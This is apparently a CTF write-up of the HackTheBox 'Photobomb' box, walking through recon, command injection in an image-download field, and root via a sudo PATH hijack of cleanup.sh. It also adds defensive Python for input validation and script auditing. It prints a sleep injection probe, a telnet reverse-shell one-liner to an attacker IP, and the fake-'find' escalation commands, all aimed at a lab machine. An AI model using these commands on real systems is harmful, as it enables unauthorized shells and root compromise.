Photobomb is an easy machine on HackTheBox which looks at command injection.
[RECON]
A simple Nmap scan to start:
$ nmap -A 10.10.11.182
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 11:00 BST
Nmap scan report for 10.10.11.182
Host is up (0.041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Here we found an HTTP server which redirects you to the address http://photobomb.htb/, so I added that hostname to my /etc/hosts file and went to have a look.
This was the website found at that address. There wasn’t much on it: clicking the link brings up a simple login pop-up. So the first thing I did was view the page source to see if there was any information disclosure. In the page source there was an interesting JavaScript file named photobomb.js.
This JavaScript file simply contained the credentials for the login pop-up.
[EXPLOITATION]
Once logged in, there were a bunch of images which you could download. After looking around for a bit there really wasn’t anything interesting at first glance, so I loaded up Burp Suite. With intercept on, I downloaded an image and saw that the request carried 3 fields identifying the photo you downloaded: photo, filetype and dimensions. It seemed possible that one of these fields was not properly sanitised and would allow command injection. To check this, you can use the command:
;&sleep10
So I sent the download request to the Repeater in Burp Suite and tested each field with that command. The field whose request comes back with a delayed response is the vulnerable one (notice the 1,549 milliseconds in the bottom right).
With the knowledge that the filetype field is vulnerable to command injection, we can use it to get a reverse shell.
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.14.10 4444 0<$TF | sh 1>$TF
Pasting this reverse shell into the filetype field, pressing Ctrl+U to URL-encode it, and forwarding the request while a netcat listener waits on port 4444 gets us a shell with user access!
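To see the bug from the application's side, here is an added example (not the writeup's or the box's own code; the page does not say what language the site is written in, so Python stands in for it). It puts the flawed pattern, a filetype value spliced into one shell string, next to a hardened handler that allowlists the three fields named above and builds an argv list that never passes through a shell, plus a small detector that flags request bodies carrying shell metacharacters. The converter name `convert`, the field formats and the sample request body are assumptions.

```python
import re
from urllib.parse import parse_qs

# Allowlists for the three download fields the page names.  The exact formats
# are assumptions for this example, not something taken from the application.
ALLOWED_FILETYPES = {"jpg", "png"}
PHOTO_RE = re.compile(r"[A-Za-z0-9_-]+\.jpg")
DIMENSIONS_RE = re.compile(r"\d{1,5}x\d{1,5}")
# Characters that end or chain a command when a value reaches /bin/sh.
SHELL_META_RE = re.compile(r"[;&|`$()<>\n\r]")


def build_command_vulnerable(photo, filetype, dimensions):
    """The flaw the page describes: form values are spliced into one shell
    string, so ';' in filetype ends the converter command and starts another.
    The tool name 'convert' is assumed.  The string is returned, never run."""
    return (f"convert source_images/{photo} -resize {dimensions} "
            f"resized_images/{photo}.{filetype}")


def validate_download_request(photo, filetype, dimensions):
    """Allowlist check.  Returns the names of fields that fail (empty = OK)."""
    bad = []
    if not PHOTO_RE.fullmatch(photo):
        bad.append("photo")
    if filetype not in ALLOWED_FILETYPES:
        bad.append("filetype")
    if not DIMENSIONS_RE.fullmatch(dimensions):
        bad.append("dimensions")
    return bad


def build_command_hardened(photo, filetype, dimensions):
    """Validate first, then return an argv list.  Hand this to
    subprocess.run(argv) with shell=False (the default): every element becomes
    exactly one execve() argument and no shell ever parses it."""
    bad = validate_download_request(photo, filetype, dimensions)
    if bad:
        raise ValueError("rejected fields: " + ", ".join(bad))
    return ["convert", f"source_images/{photo}", "-resize", dimensions,
            f"resized_images/{photo}.{filetype}"]


def suspicious_fields(request_body):
    """Detection side: list the POST fields whose decoded value carries shell
    metacharacters.  Useful on a request log or WAF feed; it complements the
    allowlist above rather than replacing it."""
    params = parse_qs(request_body, keep_blank_values=True)
    return [name for name, values in params.items()
            if any(SHELL_META_RE.search(v) for v in values)]


if __name__ == "__main__":
    # Constructed request body: '%3B' is the URL-encoded ';' of a time-based
    # probe against the filetype field, as described on the page.
    body = "photo=sample.jpg&filetype=jpg%3Bsleep+10&dimensions=3000x2000"
    print("fields with shell metacharacters:", suspicious_fields(body))
    print("vulnerable string:", build_command_vulnerable("sample.jpg", "jpg;sleep 10", "3000x2000"))
    print("rejected by allowlist:", validate_download_request("sample.jpg", "jpg;sleep 10", "3000x2000"))
    print("hardened argv:", build_command_hardened("sample.jpg", "png", "3000x2000"))
```

The allowlist is the real fix: the metacharacter regex catches the probe shown in this writeup, but an allowlist rejects everything that is not a known-good value, so it does not need to anticipate every encoding trick.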
[PRIVILEGE ESCALATION]
To get root, let’s first check to see what our user can run.
sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
So we can run /opt/cleanup.sh as root without a password; let’s check it out.
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
This script rotates the log files, and it has a simple weakness: it calls find (and, through -exec, chown) without an absolute path, so the binaries are looked up through PATH, and the SETENV tag in the sudo rule lets our user supply that PATH. To take advantage of this, I created a file called ‘find’ in the /tmp folder, made it executable and then ran cleanup.sh with PATH pointing at /tmp first.
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)
This instantly gets you root access so you can find that flag!
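As an added example (not from the writeup or the box), here is a small audit in Python that finds the root cause of this escalation in a shell script: commands invoked by bare name, which the shell (or find's -exec) resolves through PATH. It runs over the cleanup.sh text shown above and then over a hardened copy in which the bare names are replaced with absolute paths and PATH is pinned right after the shebang, so the sudo rule's SETENV no longer matters to the script. The binary locations in RESOLVED_PATHS and the pinned PATH value are assumptions for the example.

```python
import re
import shlex

# The script from the page, embedded so the audit runs offline.
CLEANUP_SH = """#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \\;
"""

# Tokens after which the next token is a command (shell syntax plus find's
# -exec family, which execvp()s its argument through PATH as well).
COMMAND_STARTERS = {"if", "then", "else", "elif", "fi", "do", "done", "while",
                    "until", "!", "&&", "||", "|", ";", "{", "}", "(", ")",
                    "-exec", "-execdir", "-ok", "-okdir"}
# Builtins/keywords that are not looked up on disk, so they cannot be hijacked.
BUILTINS = {"cd", ".", "source", "[", "test", "export", "echo", "exit",
            "read", "set", "unset", "for", "return", "local", "true", "false"}
# Assumed locations of the two binaries on the target (not taken from the page).
RESOLVED_PATHS = {"find": "/usr/bin/find", "chown": "/bin/chown"}
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def unqualified_commands(script_text):
    """Return command names the script runs by bare name, in order of first use."""
    flagged = []
    for raw in script_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:       # unbalanced quotes: skip rather than guess
            continue
        expect_command = True    # the first token of a line is a command
        for tok in tokens:
            if tok in COMMAND_STARTERS:
                expect_command = True
                continue
            if not expect_command:
                continue
            if "=" in tok and not tok.startswith("="):
                continue         # VAR=value prefix; the command comes after it
            expect_command = False
            if tok in BUILTINS or tok.startswith("/") or tok.startswith("./"):
                continue
            if tok not in flagged:
                flagged.append(tok)
    return flagged


def harden_script(script_text, resolved):
    """Pin PATH after the shebang and rewrite bare names to absolute paths.
    The rewrite is a word-boundary heuristic: it leaves 'find' alone inside
    'log/find.log' but would touch an argument that happens to be the word."""
    out = []
    for i, raw in enumerate(script_text.splitlines()):
        line = raw
        for name, path in resolved.items():
            line = re.sub(rf"(?<![\w/.\-]){re.escape(name)}(?![\w/.\-])", path, line)
        out.append(line)
        if i == 0 and raw.startswith("#!"):
            out.append("export PATH=" + SAFE_PATH)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("bare commands in cleanup.sh:", unqualified_commands(CLEANUP_SH))
    hardened = harden_script(CLEANUP_SH, RESOLVED_PATHS)
    print("bare commands after hardening:", unqualified_commands(hardened))
    print(hardened)
```

The audit reports chown as well as find: the page's escalation only needed find, but anything find launches through -exec is resolved the same way, so a hardening pass that fixes only the first hit leaves the second one behind. Dropping SETENV from the sudoers entry closes the other half of the problem.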